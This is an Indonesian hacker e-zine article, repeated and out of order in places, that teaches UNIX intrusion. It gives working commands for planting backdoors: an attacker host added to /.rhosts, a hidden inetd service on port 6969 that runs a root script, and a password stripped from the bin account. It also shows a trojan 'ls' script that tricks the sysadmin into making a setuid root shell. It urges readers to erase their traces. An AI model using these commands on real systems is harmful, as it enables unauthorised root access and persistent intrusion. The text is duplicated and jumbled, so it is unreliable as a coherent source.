dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas),
banyak eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di situs-situs tertentu,
seperti:
http://www.rootshell.com
http://www.antionline.com
http://www.rhino9.com
http://www.dhp.com/~fyodor
atau di situs kecoak, http://k-elektronik.org/arsip/eksploit (*udah mati: editor)
Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa
mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit
jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah
satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah
memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang
'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user,
maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root.
Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password.
Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah
portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi.
Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang
saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password
atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.
Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com
Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan
daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian,
tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll
(coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).
Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun
kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campurtangan dari user lokal
untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke
alamat email tertentu.)
2. Backdoor
===========
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi
untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang
sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor
memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak
jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak
terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah
backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang
sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.
Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem
dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih
kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu
ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian
besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses
root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap
selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.
Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa
sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.
Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver,
dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX.
Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:
korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts
perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user ganjaman
dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk masuk kembali ke
sistem dari account "ganjaman" di indohack2.ri.go.id :
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id
poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file
/etc/passwd sebuah sistem:
bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.
Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara
crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login
"bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang
akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih
sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri
file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,
namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak
penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau
/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan
mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah
entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan
merupakan nama file.
Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja,
sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar
cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang
didefinisikan dalam "inetd":
root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >>
/etc/services
root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >>
/etc/inetd.conf
root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r
menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak
akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu
mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control
Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin
tidak akan begitu curiga dengan nama seperti itu.
2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima
koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini
hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya
kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi
perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan
memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).
3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan
(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat,
kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke
file .rhosts milik root. Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan
untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik
root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan
memberikan jalan masuk lewat belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno
anal seks aja!). Sekarang kamu tinggal:
ganjaman@indohack2> telnet korban.lameisp.net.id 6969
nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban
akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan
dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri
lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga,
sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal:
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id
dan, BOOM!
korban#
shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com,
bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent engin badannya " :) ).
Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu
emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu,
jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik,
serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang
jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r",
dan banyak lagi.
Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara
ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus
seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir
user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal
secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis
execv("/bin/sh", "sh", NULL);.
Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel kelas kacangan ini), kamu
bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah hasil karangan
kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah berhasil
memodifikasi program sendmail di server korban.com (PSM=Pukulan Sinar Matahari):
212@GG> telnet korban.com 25
Trying mesin.korban.com
Connected to mesin.korban.com.
Escape character is '^]'.
220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; [snip]
PSM_EXEC /bin/cp /bin/sh /tmp/elit
Done master!
PSM_EXEC /bin/chmod 4755 /tmp/elit
Done master!
Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan hati
minta izin untuk berguru!
3 Trojan Horse
===============
Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya efektif
jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang betul-betul tolol.
Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu membuat
sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan perintah untuk membuka akses di dalam
kode game kamu, sedemikian rupa sehingga saat sang sysadmin menjalankan program tersebut, tanpa
disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang hacker yang lihai menulis
skrip IRC, dan skrip IRC-nya kebetulan mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip
tersebut tanpa menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan
akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)
4 Trapdoor
===========
Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini, 'Trapdoor'
diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin untuk memberikan
kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang paling gres,
atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak berjalan sama sekali
(patched systems). Jangan putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang
sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu sudah berhari-hari mengoprek
sebuah target dengan menggunakan account dan password seorang user biasa hasil colongan lewat phf,
dan sayangnya tidak ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.
Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin
diluar sana.
Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang accountnya
kamu 'pinjam'):
user1@korban> chmod 700 ~/.
Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke root jika
beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang
bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan sang admin,
justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir olehmu, jelas,
perintah ls. Disinilah letak kelemahan UNIX dibanding uh, MS-DOS. Dalam UNIX, seorang sysadmin yang
baik selalu mengetik 'full pathname' dari program manapun yang dia jalankan (seperti /bin/ls atau
/usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan
dalam daftar search path. Jadi jika misalnya sang sysadmin melakukan:
root# pwd
/usr/home/staff/user1
root# ls
maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori
/usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh cukup menarik, khan. Nah, sekarang
kita bisa buat sebuah skrip yang berisi:
#!/bin/sh
cp /bin/sh /tmp/vi-save-902887
chown root /tmp/vi-save-902887
chmod 4755 /tmp/vi-save-902887
rm ./ls
ls
simpan skrip tersebut di homedir user1, beri nama "ls" dan
user1@korban> chmod +x ls
sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir user1.
Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa saja 'mengundang'
sang admin. Login sebagai user1, dan kirim imel
user1@korban> mail root@localhost
Subject: "Heheheh Kena garap dari belakang!"
Hello sysadmin tolol! Mesin kamu sudah kebobolan!
ttd,
God of All Hackers, Virus Researchers and Lame Mailbombers,
Phardera
.
Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan perintah ls,
tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di /tmp/vi-save-902887.
Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal menyenangkan dengannya.
Tinggal login sebagai user2 beberapa waktu kemudian, dan nikmati ketenangan pikiran lewat shell root!
Heheheh.
Penutup
=======
Begitu dulu, deh, penjelasan dari kami. Semoga ada gunannya untuk kalian semua. Nggak lupa iseng-iseng
nereakin seluruh kru IndoHack, hackerindo, underground, dan kecoak elektronik!
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
=====================================================================================
Eksploit, Trapdoor, Backdoor, dan Trojan Horse
dijelaskan oleh: Ganjaman dan SuperCock [members of IndoHack]
=====================================================================================
jaringan komputer seperti exploit, trojan, dll dan ingin mengetahui konsep-konsep dasarnya.
Terimakasih kepada staf kecoak yang bersedia mempublikasikan artikel ini, terutama
LithiumError dan BigD yang telah memberikan masukan-masukan sangat berguna kepada kami.
Seperti biasa, ini hanyalah untuk tujuan informasi saja, dan mungkin sysadmin yang membaca
bisa menggunakan informasi ini untuk melindungi sistem dibawah pengawasan mereka.
Artikel ini berisi metode backdoor/trapdoor dan kode-kode yang bisa langsung diterapkan,
sebab kami ingin agar para pembaca mengetahui bagaimana * tepatnya * metode ybs bekerja.
Dan lagi, menyensor informasi bukanlah urusan kami.
1. Eksploit
===========
Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang
baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit
(exploit, 'sploits) itu?". Dalam konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan
artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih
spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah
sistem untuk tujuan-tujuan yang diluar dari penggunaan normal.' Kelemahan-kelemahan ini bisa
berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan lain-lain.
Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita
akses tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah
'mengeksploit program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root' bukanlah
satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah alami sendiri, kadang
sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan
'header forging', 'ip spoofing', 'denial of service attack', dan 'mail bombing'
(hello, Anton Pardede!).
Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote.
Eksploit lokal adalah jenis eksploit yang hanya bisa dijalankan jika kamu sudah punya akses ke
dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,
sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh
dari eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race
conditions (dimana dua proses saling berlomba untuk menyelesaikan tugas masing-masing, biasanya
proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese root temporer sementara
proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user
biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan
SunOS.) Bagaimana caranya agar saya bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa
menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol (lebih
baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram
dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas),
banyak eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di situs-situs tertentu,
seperti:
http://www.rootshell.com
http://www.antionline.com
http://www.rhino9.com
http://www.dhp.com/~fyodor
atau di situs kecoak, http://k-elektronik.org/arsip/eksploit (*udah mati: editor)
Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa
mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit
jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah
satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah
memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang
'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user,
maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root.
Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password.
Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah
portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi.
Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang
saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password
atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.
Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com
Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan
daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian,
tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll
(coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).
Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun
kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campurtangan dari user lokal
untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke
alamat email tertentu.)
2. Backdoor
===========
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi
untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang
sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor
memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak
jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak
terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah
backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang
sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.
Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem
dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih
kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu
ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian
besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses
root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap
selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.
Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa
sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.
Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver,
dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX.
Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:
korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts
perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user ganjaman
dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk masuk kembali ke
sistem dari account "ganjaman" di indohack2.ri.go.id :
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id
poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file
/etc/passwd sebuah sistem:
bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.
Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara
crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login
"bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang
akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih
sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri
file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,
namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak
penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau
/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan
mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah
entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan
merupakan nama file.
Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja,
sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar
cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang
didefinisikan dalam "inetd":
root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >>
/etc/services
root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >>
/etc/inetd.conf
root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r
menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak
akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu
mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control
Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin
tidak akan begitu curiga dengan nama seperti itu.
2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima
koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini
hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya
kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi
perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan
memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).
3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan
(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat,
kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke
file .rhosts milik root. Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan
untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik
root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan
memberikan jalan masuk lewat belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno
anal seks aja!). Sekarang kamu tinggal:
ganjaman@indohack2> telnet korban.lameisp.net.id 6969
nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban
akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan
dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri
lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga,
sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal:
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id
dan, BOOM!
korban#
shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com,
bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent engin badannya " :) ).
Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu
emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu,
jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik,
serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang
jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r",
dan banyak lagi.
Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara
ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus
seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir
user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal
secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis
execv("/bin/sh", "sh", NULL);.
Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel kelas kacangan ini), kamu
bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah hasil karangan
kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah berhasil
memodifikasi program sendmail di server korban.com (PSM=Pukulan Sinar Matahari):
212@GG> telnet korban.com 25
Trying mesin.korban.com
Connected to mesin.korban.com.
Escape character is '^]'.
220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; [snip]
PSM_EXEC /bin/cp /bin/sh /tmp/elit
Done master!
PSM_EXEC /bin/chmod 4755 /tmp/elit
Done master!
Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan hati
minta izin untuk berguru!
3 Trojan Horse
===============
Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya efektif
jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang betul-betul tolol.
Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu membuat
sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan perintah untuk membuka akses di dalam
kode game kamu, sedemikian rupa sehingga saat sang sysadmin menjalankan program tersebut, tanpa
disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang hacker yang lihai menulis
skrip IRC, dan skrip IRC-nya kebetulan mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip
tersebut tanpa menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan
akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)
4 Trapdoor
===========
